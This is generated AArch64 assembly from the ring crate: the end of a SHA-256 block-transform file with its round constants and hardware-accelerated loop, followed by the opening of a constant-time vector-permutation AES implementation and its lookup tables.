eor w28,w27,w20 // a^b, b^c in next round
eor w16,w16,w23,ror#25 // Sigma1(e)
eor w4,w4,w27,ror#13
add w26,w26,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w2,w2,w11,ror#19
eor w3,w3,w14,lsr#3 // sigma0(X[i+1])
add w26,w26,w16 // h+=Sigma1(e)
eor w19,w19,w20 // Maj(a,b,c)
eor w17,w4,w27,ror#22 // Sigma0(a)
eor w2,w2,w11,lsr#10 // sigma1(X[i+14])
add w13,w13,w6
add w22,w22,w26 // d+=h
add w26,w26,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w13,w13,w3
add w26,w26,w17 // h+=Sigma0(a)
add w13,w13,w2
ldr w2,[sp,#12]
str w5,[sp,#8]
ror w16,w22,#6
add w25,w25,w19 // h+=K[i]
ror w4,w15,#7
and w17,w23,w22
ror w3,w12,#17
bic w19,w24,w22
ror w5,w26,#2
add w25,w25,w13 // h+=X[i]
eor w16,w16,w22,ror#11
eor w4,w4,w15,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w26,w27 // a^b, b^c in next round
eor w16,w16,w22,ror#25 // Sigma1(e)
eor w5,w5,w26,ror#13
add w25,w25,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w3,w3,w12,ror#19
eor w4,w4,w15,lsr#3 // sigma0(X[i+1])
add w25,w25,w16 // h+=Sigma1(e)
eor w28,w28,w27 // Maj(a,b,c)
eor w17,w5,w26,ror#22 // Sigma0(a)
eor w3,w3,w12,lsr#10 // sigma1(X[i+14])
add w14,w14,w7
add w21,w21,w25 // d+=h
add w25,w25,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w14,w14,w4
add w25,w25,w17 // h+=Sigma0(a)
add w14,w14,w3
ldr w3,[sp,#0]
str w6,[sp,#12]
ror w16,w21,#6
add w24,w24,w28 // h+=K[i]
ror w5,w0,#7
and w17,w22,w21
ror w4,w13,#17
bic w28,w23,w21
ror w6,w25,#2
add w24,w24,w14 // h+=X[i]
eor w16,w16,w21,ror#11
eor w5,w5,w0,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w25,w26 // a^b, b^c in next round
eor w16,w16,w21,ror#25 // Sigma1(e)
eor w6,w6,w25,ror#13
add w24,w24,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w4,w4,w13,ror#19
eor w5,w5,w0,lsr#3 // sigma0(X[i+1])
add w24,w24,w16 // h+=Sigma1(e)
eor w19,w19,w26 // Maj(a,b,c)
eor w17,w6,w25,ror#22 // Sigma0(a)
eor w4,w4,w13,lsr#10 // sigma1(X[i+14])
add w15,w15,w8
add w20,w20,w24 // d+=h
add w24,w24,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w15,w15,w5
add w24,w24,w17 // h+=Sigma0(a)
add w15,w15,w4
ldr w4,[sp,#4]
str w7,[sp,#0]
ror w16,w20,#6
add w23,w23,w19 // h+=K[i]
ror w6,w1,#7
and w17,w21,w20
ror w5,w14,#17
bic w19,w22,w20
ror w7,w24,#2
add w23,w23,w15 // h+=X[i]
eor w16,w16,w20,ror#11
eor w6,w6,w1,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w24,w25 // a^b, b^c in next round
eor w16,w16,w20,ror#25 // Sigma1(e)
eor w7,w7,w24,ror#13
add w23,w23,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w5,w5,w14,ror#19
eor w6,w6,w1,lsr#3 // sigma0(X[i+1])
add w23,w23,w16 // h+=Sigma1(e)
eor w28,w28,w25 // Maj(a,b,c)
eor w17,w7,w24,ror#22 // Sigma0(a)
eor w5,w5,w14,lsr#10 // sigma1(X[i+14])
add w0,w0,w9
add w27,w27,w23 // d+=h
add w23,w23,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w0,w0,w6
add w23,w23,w17 // h+=Sigma0(a)
add w0,w0,w5
ldr w5,[sp,#8]
str w8,[sp,#4]
ror w16,w27,#6
add w22,w22,w28 // h+=K[i]
ror w7,w2,#7
and w17,w20,w27
ror w6,w15,#17
bic w28,w21,w27
ror w8,w23,#2
add w22,w22,w0 // h+=X[i]
eor w16,w16,w27,ror#11
eor w7,w7,w2,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w23,w24 // a^b, b^c in next round
eor w16,w16,w27,ror#25 // Sigma1(e)
eor w8,w8,w23,ror#13
add w22,w22,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w6,w6,w15,ror#19
eor w7,w7,w2,lsr#3 // sigma0(X[i+1])
add w22,w22,w16 // h+=Sigma1(e)
eor w19,w19,w24 // Maj(a,b,c)
eor w17,w8,w23,ror#22 // Sigma0(a)
eor w6,w6,w15,lsr#10 // sigma1(X[i+14])
add w1,w1,w10
add w26,w26,w22 // d+=h
add w22,w22,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w1,w1,w7
add w22,w22,w17 // h+=Sigma0(a)
add w1,w1,w6
ldr w6,[sp,#12]
str w9,[sp,#8]
ror w16,w26,#6
add w21,w21,w19 // h+=K[i]
ror w8,w3,#7
and w17,w27,w26
ror w7,w0,#17
bic w19,w20,w26
ror w9,w22,#2
add w21,w21,w1 // h+=X[i]
eor w16,w16,w26,ror#11
eor w8,w8,w3,ror#18
orr w17,w17,w19 // Ch(e,f,g)
eor w19,w22,w23 // a^b, b^c in next round
eor w16,w16,w26,ror#25 // Sigma1(e)
eor w9,w9,w22,ror#13
add w21,w21,w17 // h+=Ch(e,f,g)
and w28,w28,w19 // (b^c)&=(a^b)
eor w7,w7,w0,ror#19
eor w8,w8,w3,lsr#3 // sigma0(X[i+1])
add w21,w21,w16 // h+=Sigma1(e)
eor w28,w28,w23 // Maj(a,b,c)
eor w17,w9,w22,ror#22 // Sigma0(a)
eor w7,w7,w0,lsr#10 // sigma1(X[i+14])
add w2,w2,w11
add w25,w25,w21 // d+=h
add w21,w21,w28 // h+=Maj(a,b,c)
ldr w28,[x30],#4 // *K++, w19 in next round
add w2,w2,w8
add w21,w21,w17 // h+=Sigma0(a)
add w2,w2,w7
ldr w7,[sp,#0]
str w10,[sp,#12]
ror w16,w25,#6
add w20,w20,w28 // h+=K[i]
ror w9,w4,#7
and w17,w26,w25
ror w8,w1,#17
bic w28,w27,w25
ror w10,w21,#2
add w20,w20,w2 // h+=X[i]
eor w16,w16,w25,ror#11
eor w9,w9,w4,ror#18
orr w17,w17,w28 // Ch(e,f,g)
eor w28,w21,w22 // a^b, b^c in next round
eor w16,w16,w25,ror#25 // Sigma1(e)
eor w10,w10,w21,ror#13
add w20,w20,w17 // h+=Ch(e,f,g)
and w19,w19,w28 // (b^c)&=(a^b)
eor w8,w8,w1,ror#19
eor w9,w9,w4,lsr#3 // sigma0(X[i+1])
add w20,w20,w16 // h+=Sigma1(e)
eor w19,w19,w22 // Maj(a,b,c)
eor w17,w10,w21,ror#22 // Sigma0(a)
eor w8,w8,w1,lsr#10 // sigma1(X[i+14])
add w3,w3,w12
add w24,w24,w20 // d+=h
add w20,w20,w19 // h+=Maj(a,b,c)
ldr w19,[x30],#4 // *K++, w28 in next round
add w3,w3,w9
add w20,w20,w17 // h+=Sigma0(a)
add w3,w3,w8
cbnz w19,.Loop_16_xx
ldp x0,x2,[x29,#96]
ldr x1,[x29,#112]
sub x30,x30,#260 // rewind
ldp w3,w4,[x0]
ldp w5,w6,[x0,#2*4]
add x1,x1,#14*4 // advance input pointer
ldp w7,w8,[x0,#4*4]
add w20,w20,w3
ldp w9,w10,[x0,#6*4]
add w21,w21,w4
add w22,w22,w5
add w23,w23,w6
stp w20,w21,[x0]
add w24,w24,w7
add w25,w25,w8
stp w22,w23,[x0,#2*4]
add w26,w26,w9
add w27,w27,w10
cmp x1,x2
stp w24,w25,[x0,#4*4]
stp w26,w27,[x0,#6*4]
b.ne .Loop
ldp x19,x20,[x29,#16]
add sp,sp,#4*4
ldp x21,x22,[x29,#32]
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldp x29,x30,[sp],#128
AARCH64_VALIDATE_LINK_REGISTER
ret
.size sha256_block_data_order_nohw,.-sha256_block_data_order_nohw
.section .rodata
.align 6
.type .LK256,%object
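// The 64 SHA-256 round constants: the first 32 bits of the fractional
// parts of the cube roots of the first 64 primes, followed by a zero
// terminator that the scalar loop uses to detect the final round.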
.LK256:
.long 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
.long 0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
.long 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
.long 0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
.long 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
.long 0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
.long 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
.long 0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
.long 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
.long 0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
.long 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
.long 0xd192e819,0xd6990624,0xf40e3585,0x106aa070
.long 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
.long 0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
.long 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
.long 0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
.long 0 //terminator
.size .LK256,.-.LK256
.byte 83,72,65,50,53,54,32,98,108,111,99,107,32,116,114,97,110,115,102,111,114,109,32,102,111,114,32,65,82,77,118,56,44,32,67,82,89,80,84,79,71,65,77,83,32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115,115,108,46,111,114,103,62,0
.align 2
.align 2
.text
#ifndef __KERNEL__
.globl sha256_block_data_order_hw
.hidden sha256_block_data_order_hw
.type sha256_block_data_order_hw,%function
.align 6
sha256_block_data_order_hw:
// Armv8.3-A PAuth: even though x30 is pushed to the stack, it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
ld1 {v0.4s,v1.4s},[x0]
adrp x3,.LK256
add x3,x3,:lo12:.LK256
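// Each .Loop_hw iteration hashes one 64-byte block with the Armv8
// SHA-256 extension. The .inst words below are the fixed encodings of
// sha256h/sha256h2/sha256su0/sha256su1, emitted as raw words so the
// file assembles even on toolchains not configured for the crypto
// extension. v0/v1 carry the state (ABCD/EFGH), v18/v19 keep a copy
// for the final feed-forward addition, and "orr v2,v0,v0" is simply a
// vector register move.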
.Loop_hw:
ld1 {v4.16b,v5.16b,v6.16b,v7.16b},[x1],#64
sub x2,x2,#1
ld1 {v16.4s},[x3],#16
rev32 v4.16b,v4.16b
rev32 v5.16b,v5.16b
rev32 v6.16b,v6.16b
rev32 v7.16b,v7.16b
orr v18.16b,v0.16b,v0.16b // offload
orr v19.16b,v1.16b,v1.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v4.4s
.inst 0x5e2828a4 //sha256su0 v4.16b,v5.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e0760c4 //sha256su1 v4.16b,v6.16b,v7.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v5.4s
.inst 0x5e2828c5 //sha256su0 v5.16b,v6.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0460e5 //sha256su1 v5.16b,v7.16b,v4.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v6.4s
.inst 0x5e2828e6 //sha256su0 v6.16b,v7.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e056086 //sha256su1 v6.16b,v4.16b,v5.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v7.4s
.inst 0x5e282887 //sha256su0 v7.16b,v4.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0660a7 //sha256su1 v7.16b,v5.16b,v6.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v4.4s
.inst 0x5e2828a4 //sha256su0 v4.16b,v5.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e0760c4 //sha256su1 v4.16b,v6.16b,v7.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v5.4s
.inst 0x5e2828c5 //sha256su0 v5.16b,v6.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0460e5 //sha256su1 v5.16b,v7.16b,v4.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v6.4s
.inst 0x5e2828e6 //sha256su0 v6.16b,v7.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e056086 //sha256su1 v6.16b,v4.16b,v5.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v7.4s
.inst 0x5e282887 //sha256su0 v7.16b,v4.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0660a7 //sha256su1 v7.16b,v5.16b,v6.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v4.4s
.inst 0x5e2828a4 //sha256su0 v4.16b,v5.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e0760c4 //sha256su1 v4.16b,v6.16b,v7.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v5.4s
.inst 0x5e2828c5 //sha256su0 v5.16b,v6.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0460e5 //sha256su1 v5.16b,v7.16b,v4.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v6.4s
.inst 0x5e2828e6 //sha256su0 v6.16b,v7.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
.inst 0x5e056086 //sha256su1 v6.16b,v4.16b,v5.16b
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v7.4s
.inst 0x5e282887 //sha256su0 v7.16b,v4.16b
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
.inst 0x5e0660a7 //sha256su1 v7.16b,v5.16b,v6.16b
ld1 {v17.4s},[x3],#16
add v16.4s,v16.4s,v4.4s
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
ld1 {v16.4s},[x3],#16
add v17.4s,v17.4s,v5.4s
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
ld1 {v17.4s},[x3]
add v16.4s,v16.4s,v6.4s
sub x3,x3,#64*4-16 // rewind
orr v2.16b,v0.16b,v0.16b
.inst 0x5e104020 //sha256h v0.16b,v1.16b,v16.4s
.inst 0x5e105041 //sha256h2 v1.16b,v2.16b,v16.4s
add v17.4s,v17.4s,v7.4s
orr v2.16b,v0.16b,v0.16b
.inst 0x5e114020 //sha256h v0.16b,v1.16b,v17.4s
.inst 0x5e115041 //sha256h2 v1.16b,v2.16b,v17.4s
add v0.4s,v0.4s,v18.4s
add v1.4s,v1.4s,v19.4s
cbnz x2,.Loop_hw
st1 {v0.4s,v1.4s},[x0]
ldr x29,[sp],#16
ret
.size sha256_block_data_order_hw,.-sha256_block_data_order_hw
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__ELF__)
|
mi2bjss/Pressel-site | 26,206 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/vpaes-armv8-linux64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__ELF__)
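//
// Vector-permutation AES (Mike Hamburg's "vpaes"): the S-box and the
// MixColumns-style steps are evaluated with tbl lookups into the
// 16-byte constant tables below rather than memory-resident lookup
// tables, so there are no secret-dependent memory accesses and the
// code runs in constant time. The x86 instructions quoted in the
// comments are the SSSE3 originals this port was derived from.
//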
.section .rodata
.type _vpaes_consts,%object
.align 7 // totally strategic alignment
_vpaes_consts:
.Lk_mc_forward: // mc_forward
.quad 0x0407060500030201, 0x0C0F0E0D080B0A09
.quad 0x080B0A0904070605, 0x000302010C0F0E0D
.quad 0x0C0F0E0D080B0A09, 0x0407060500030201
.quad 0x000302010C0F0E0D, 0x080B0A0904070605
.Lk_mc_backward: // mc_backward
.quad 0x0605040702010003, 0x0E0D0C0F0A09080B
.quad 0x020100030E0D0C0F, 0x0A09080B06050407
.quad 0x0E0D0C0F0A09080B, 0x0605040702010003
.quad 0x0A09080B06050407, 0x020100030E0D0C0F
.Lk_sr: // sr
.quad 0x0706050403020100, 0x0F0E0D0C0B0A0908
.quad 0x030E09040F0A0500, 0x0B06010C07020D08
.quad 0x0F060D040B020900, 0x070E050C030A0108
.quad 0x0B0E0104070A0D00, 0x0306090C0F020508
//
// "Hot" constants
//
.Lk_inv: // inv, inva
.quad 0x0E05060F0D080180, 0x040703090A0B0C02
.quad 0x01040A060F0B0780, 0x030D0E0C02050809
.Lk_ipt: // input transform (lo, hi)
.quad 0xC2B2E8985A2A7000, 0xCABAE09052227808
.quad 0x4C01307D317C4D00, 0xCD80B1FCB0FDCC81
.Lk_sbo: // sbou, sbot
.quad 0xD0D26D176FBDC700, 0x15AABF7AC502A878
.quad 0xCFE474A55FBB6A00, 0x8E1E90D1412B35FA
.Lk_sb1: // sb1u, sb1t
.quad 0x3618D415FAE22300, 0x3BF7CCC10D2ED9EF
.quad 0xB19BE18FCB503E00, 0xA5DF7A6E142AF544
.Lk_sb2: // sb2u, sb2t
.quad 0x69EB88400AE12900, 0xC2A163C8AB82234A
.quad 0xE27A93C60B712400, 0x5EB7E955BC982FCD
//
// Key schedule constants
//
.Lk_dksd: // decryption key schedule: invskew x*D
.quad 0xFEB91A5DA3E44700, 0x0740E3A45A1DBEF9
.quad 0x41C277F4B5368300, 0x5FDC69EAAB289D1E
.Lk_dksb: // decryption key schedule: invskew x*B
.quad 0x9A4FCA1F8550D500, 0x03D653861CC94C99
.quad 0x115BEDA7B6FC4A00, 0xD993256F7E3482C8
.Lk_dkse: // decryption key schedule: invskew x*E + 0x63
.quad 0xD5031CCA1FC9D600, 0x53859A4C994F5086
.quad 0xA23196054FDC7BE8, 0xCD5EF96A20B31487
.Lk_dks9: // decryption key schedule: invskew x*9
.quad 0xB6116FC87ED9A700, 0x4AED933482255BFC
.quad 0x4576516227143300, 0x8BB89FACE9DAFDCE
.Lk_rcon: // rcon
.quad 0x1F8391B9AF9DEEB6, 0x702A98084D7C7D81
.Lk_opt: // output transform
.quad 0xFF9F4929D6B66000, 0xF7974121DEBE6808
.quad 0x01EDBD5150BCEC00, 0xE10D5DB1B05C0CE0
.Lk_deskew: // deskew tables: inverts the sbox's "skew"
.quad 0x07E4A34047A4E300, 0x1DFEB95A5DBEF91A
.quad 0x5F36B5DC83EA6900, 0x2841C2ABF49D1E77
.byte 86,101,99,116,111,114,32,80,101,114,109,117,116,97,116,105,111,110,32,65,69,83,32,102,111,114,32,65,82,77,118,56,44,32,77,105,107,101,32,72,97,109,98,117,114,103,32,40,83,116,97,110,102,111,114,100,32,85,110,105,118,101,114,115,105,116,121,41,0
.align 2
.size _vpaes_consts,.-_vpaes_consts
.align 6
.text
##
## _aes_preheat
##
## Fills register %r10 -> .aes_consts (so the code can be built with -fPIC)
## and %xmm9-%xmm15 as specified below.
##
.type _vpaes_encrypt_preheat,%function
.align 4
_vpaes_encrypt_preheat:
adrp x10, .Lk_inv
add x10, x10, :lo12:.Lk_inv
movi v17.16b, #0x0f
ld1 {v18.2d,v19.2d}, [x10],#32 // .Lk_inv
ld1 {v20.2d,v21.2d,v22.2d,v23.2d}, [x10],#64 // .Lk_ipt, .Lk_sbo
ld1 {v24.2d,v25.2d,v26.2d,v27.2d}, [x10] // .Lk_sb1, .Lk_sb2
ret
.size _vpaes_encrypt_preheat,.-_vpaes_encrypt_preheat
##
## _aes_encrypt_core
##
## AES-encrypt %xmm0.
##
## Inputs:
## %xmm0 = input
## %xmm9-%xmm15 as in _vpaes_preheat
## (%rdx) = scheduled keys
##
## Output in %xmm0
## Clobbers %xmm1-%xmm5, %r9, %r10, %r11, %rax
## Preserves %xmm6 - %xmm8 so you get some local vectors
##
##
.type _vpaes_encrypt_core,%function
.align 4
_vpaes_encrypt_core:
mov x9, x2
ldr w8, [x2,#240] // pull rounds
adrp x11, .Lk_mc_forward+16
add x11, x11, :lo12:.Lk_mc_forward+16
// vmovdqa .Lk_ipt(%rip), %xmm2 # iptlo
ld1 {v16.2d}, [x9], #16 // vmovdqu (%r9), %xmm5 # round0 key
and v1.16b, v7.16b, v17.16b // vpand %xmm9, %xmm0, %xmm1
ushr v0.16b, v7.16b, #4 // vpsrlb $4, %xmm0, %xmm0
tbl v1.16b, {v20.16b}, v1.16b // vpshufb %xmm1, %xmm2, %xmm1
// vmovdqa .Lk_ipt+16(%rip), %xmm3 # ipthi
tbl v2.16b, {v21.16b}, v0.16b // vpshufb %xmm0, %xmm3, %xmm2
eor v0.16b, v1.16b, v16.16b // vpxor %xmm5, %xmm1, %xmm0
eor v0.16b, v0.16b, v2.16b // vpxor %xmm2, %xmm0, %xmm0
b .Lenc_entry
.align 4
.Lenc_loop:
// middle of middle round
add x10, x11, #0x40
tbl v4.16b, {v25.16b}, v2.16b // vpshufb %xmm2, %xmm13, %xmm4 # 4 = sb1u
ld1 {v1.2d}, [x11], #16 // vmovdqa -0x40(%r11,%r10), %xmm1 # .Lk_mc_forward[]
tbl v0.16b, {v24.16b}, v3.16b // vpshufb %xmm3, %xmm12, %xmm0 # 0 = sb1t
eor v4.16b, v4.16b, v16.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
tbl v5.16b, {v27.16b}, v2.16b // vpshufb %xmm2, %xmm15, %xmm5 # 4 = sb2u
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = A
tbl v2.16b, {v26.16b}, v3.16b // vpshufb %xmm3, %xmm14, %xmm2 # 2 = sb2t
ld1 {v4.2d}, [x10] // vmovdqa (%r11,%r10), %xmm4 # .Lk_mc_backward[]
tbl v3.16b, {v0.16b}, v1.16b // vpshufb %xmm1, %xmm0, %xmm3 # 0 = B
eor v2.16b, v2.16b, v5.16b // vpxor %xmm5, %xmm2, %xmm2 # 2 = 2A
tbl v0.16b, {v0.16b}, v4.16b // vpshufb %xmm4, %xmm0, %xmm0 # 3 = D
eor v3.16b, v3.16b, v2.16b // vpxor %xmm2, %xmm3, %xmm3 # 0 = 2A+B
tbl v4.16b, {v3.16b}, v1.16b // vpshufb %xmm1, %xmm3, %xmm4 # 0 = 2B+C
eor v0.16b, v0.16b, v3.16b // vpxor %xmm3, %xmm0, %xmm0 # 3 = 2A+B+D
and x11, x11, #~(1<<6) // and $0x30, %r11 # ... mod 4
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = 2A+3B+C+D
sub w8, w8, #1 // nr--
.Lenc_entry:
// top of round
and v1.16b, v0.16b, v17.16b // vpand %xmm0, %xmm9, %xmm1 # 0 = k
ushr v0.16b, v0.16b, #4 // vpsrlb $4, %xmm0, %xmm0 # 1 = i
tbl v5.16b, {v19.16b}, v1.16b // vpshufb %xmm1, %xmm11, %xmm5 # 2 = a/k
eor v1.16b, v1.16b, v0.16b // vpxor %xmm0, %xmm1, %xmm1 # 0 = j
tbl v3.16b, {v18.16b}, v0.16b // vpshufb %xmm0, %xmm10, %xmm3 # 3 = 1/i
tbl v4.16b, {v18.16b}, v1.16b // vpshufb %xmm1, %xmm10, %xmm4 # 4 = 1/j
eor v3.16b, v3.16b, v5.16b // vpxor %xmm5, %xmm3, %xmm3 # 3 = iak = 1/i + a/k
eor v4.16b, v4.16b, v5.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = jak = 1/j + a/k
tbl v2.16b, {v18.16b}, v3.16b // vpshufb %xmm3, %xmm10, %xmm2 # 2 = 1/iak
tbl v3.16b, {v18.16b}, v4.16b // vpshufb %xmm4, %xmm10, %xmm3 # 3 = 1/jak
eor v2.16b, v2.16b, v1.16b // vpxor %xmm1, %xmm2, %xmm2 # 2 = io
eor v3.16b, v3.16b, v0.16b // vpxor %xmm0, %xmm3, %xmm3 # 3 = jo
ld1 {v16.2d}, [x9],#16 // vmovdqu (%r9), %xmm5
cbnz w8, .Lenc_loop
// middle of last round
add x10, x11, #0x80
// vmovdqa -0x60(%r10), %xmm4 # 3 : sbou .Lk_sbo
// vmovdqa -0x50(%r10), %xmm0 # 0 : sbot .Lk_sbo+16
tbl v4.16b, {v22.16b}, v2.16b // vpshufb %xmm2, %xmm4, %xmm4 # 4 = sbou
ld1 {v1.2d}, [x10] // vmovdqa 0x40(%r11,%r10), %xmm1 # .Lk_sr[]
tbl v0.16b, {v23.16b}, v3.16b // vpshufb %xmm3, %xmm0, %xmm0 # 0 = sb1t
eor v4.16b, v4.16b, v16.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = A
tbl v0.16b, {v0.16b}, v1.16b // vpshufb %xmm1, %xmm0, %xmm0
ret
.size _vpaes_encrypt_core,.-_vpaes_encrypt_core
.type _vpaes_encrypt_2x,%function
.align 4
_vpaes_encrypt_2x:
mov x9, x2
ldr w8, [x2,#240] // pull rounds
adrp x11, .Lk_mc_forward+16
add x11, x11, :lo12:.Lk_mc_forward+16
// vmovdqa .Lk_ipt(%rip), %xmm2 # iptlo
ld1 {v16.2d}, [x9], #16 // vmovdqu (%r9), %xmm5 # round0 key
and v1.16b, v14.16b, v17.16b // vpand %xmm9, %xmm0, %xmm1
ushr v0.16b, v14.16b, #4 // vpsrlb $4, %xmm0, %xmm0
and v9.16b, v15.16b, v17.16b
ushr v8.16b, v15.16b, #4
tbl v1.16b, {v20.16b}, v1.16b // vpshufb %xmm1, %xmm2, %xmm1
tbl v9.16b, {v20.16b}, v9.16b
// vmovdqa .Lk_ipt+16(%rip), %xmm3 # ipthi
tbl v2.16b, {v21.16b}, v0.16b // vpshufb %xmm0, %xmm3, %xmm2
tbl v10.16b, {v21.16b}, v8.16b
eor v0.16b, v1.16b, v16.16b // vpxor %xmm5, %xmm1, %xmm0
eor v8.16b, v9.16b, v16.16b
eor v0.16b, v0.16b, v2.16b // vpxor %xmm2, %xmm0, %xmm0
eor v8.16b, v8.16b, v10.16b
b .Lenc_2x_entry
.align 4
.Lenc_2x_loop:
// middle of middle round
add x10, x11, #0x40
tbl v4.16b, {v25.16b}, v2.16b // vpshufb %xmm2, %xmm13, %xmm4 # 4 = sb1u
tbl v12.16b, {v25.16b}, v10.16b
ld1 {v1.2d}, [x11], #16 // vmovdqa -0x40(%r11,%r10), %xmm1 # .Lk_mc_forward[]
tbl v0.16b, {v24.16b}, v3.16b // vpshufb %xmm3, %xmm12, %xmm0 # 0 = sb1t
tbl v8.16b, {v24.16b}, v11.16b
eor v4.16b, v4.16b, v16.16b // vpxor %xmm5, %xmm4, %xmm4 # 4 = sb1u + k
eor v12.16b, v12.16b, v16.16b
tbl v5.16b, {v27.16b}, v2.16b // vpshufb %xmm2, %xmm15, %xmm5 # 4 = sb2u
tbl v13.16b, {v27.16b}, v10.16b
eor v0.16b, v0.16b, v4.16b // vpxor %xmm4, %xmm0, %xmm0 # 0 = A
eor v8.16b, v8.16b, v12.16b
tbl v2.16b, {v26.16b}, v3.16b // vpshufb %xmm3, %xmm14, %xmm2 # 2 = sb2t
tbl v10.16b, {v26.16b}, v11.16b
